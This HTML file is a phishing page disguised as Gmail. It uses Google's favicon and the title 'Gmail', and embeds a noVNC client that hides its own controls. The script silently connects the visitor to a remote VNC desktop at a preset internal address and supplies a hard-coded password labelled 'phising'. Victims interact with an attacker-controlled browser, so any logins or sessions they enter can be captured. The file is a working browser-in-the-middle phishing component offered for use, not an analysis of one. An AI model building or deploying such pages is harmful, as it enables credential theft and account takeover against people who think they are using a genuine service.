<!DOCTYPE html>
<html lang="en">

<head>
    <title>Gmail</title>
    <link rel="icon" type="image/x-icon" href="https://www.google.com/favicon.ico">
    <meta charset="utf-8">
    <style>
        body {
            margin: 0;
            background-color: dimgrey;
            height: 100%;
            display: flex;
            flex-direction: column;
        }

        html {
            height: 100%;
        }

        #top_bar {
            display: none;
            background-color: #6e84a3;
            color: white;
            font: bold 12px Helvetica;
            padding: 6px 5px 4px 5px;
            border-bottom: 1px outset;
        }

        #status {
            text-align: center;
        }

        #sendCtrlAltDelButton {
            position: fixed;
            top: 0px;
            right: 0px;
            border: 1px outset;
            padding: 5px 5px 4px 5px;
            cursor: pointer;
        }

        #screen {
            flex: 1;
            overflow: hidden;
        }
    </style>

    <script type="module" crossorigin="anonymous">
        import RFB from './core/rfb.js';
        let rfb;
        let desktopName;
        function connectedToServer(e) {
            status("Connected to " + desktopName);
        }

        function disconnectedFromServer(e) {
            if (e.detail.clean) {
                status("Disconnected");
            } else {
                status("Something went wrong, connection is closed");
            }
        }

        function credentialsAreRequired(e) {
            const password = 'phising';
            rfb.sendCredentials({ password: password });
        }

        function updateDesktopName(e) {
            desktopName = e.detail.name;
        }

        function sendCtrlAltDel() {
            rfb.sendCtrlAltDel();
            return false;
        }

        function status(text) {
            document.getElementById('status').textContent = text;
        }

        function readQueryVariable(name, defaultValue) {
            const re = new RegExp('.*[?&]' + name + '=([^&#]*)'), match = ''.concat(document.location.href, window.location.hash).match(re);
            if (match) {
                return decodeURIComponent(match[1]);
            }
            return defaultValue;
        }
        document.getElementById('sendCtrlAltDelButton').onclick = sendCtrlAltDel;
        const host = readQueryVariable('host', '10.0.0.200');
        let port = readQueryVariable('port', 80);
        const password = readQueryVariable('password');
        const path = readQueryVariable('path', 'websockify');
        status("Connecting");
        let url;
        if (window.location.protocol === "https:") {
            url = 'wss';
        } else {
            url = 'ws';
        }
        url += '://' + host;
        if (port) {
            url += ':' + port;
        }
        url += '/' + path;
        rfb = new RFB(document.getElementById('screen'), url, { credentials: { password: password } });
        rfb.addEventListener("connect", connectedToServer);
        rfb.addEventListener("disconnect", disconnectedFromServer);
        rfb.addEventListener("credentialsrequired", credentialsAreRequired);
        rfb.addEventListener("desktopname", updateDesktopName);
        rfb.viewOnly = readQueryVariable('view_only', false);
        rfb.scaleViewport = readQueryVariable('scale', 'remote');
        rfb.resizeSession = readQueryVariable('resize', 'remote');
    </script>
</head>

<body>
    <div id="top_bar">
        <div id="status">Loading</div>
        <div id="sendCtrlAltDelButton">Send CtrlAltDel</div>
    </div>
    <div id="screen">
        <!-- This is where the remote screen will appear -->
    </div>
</body>

</html>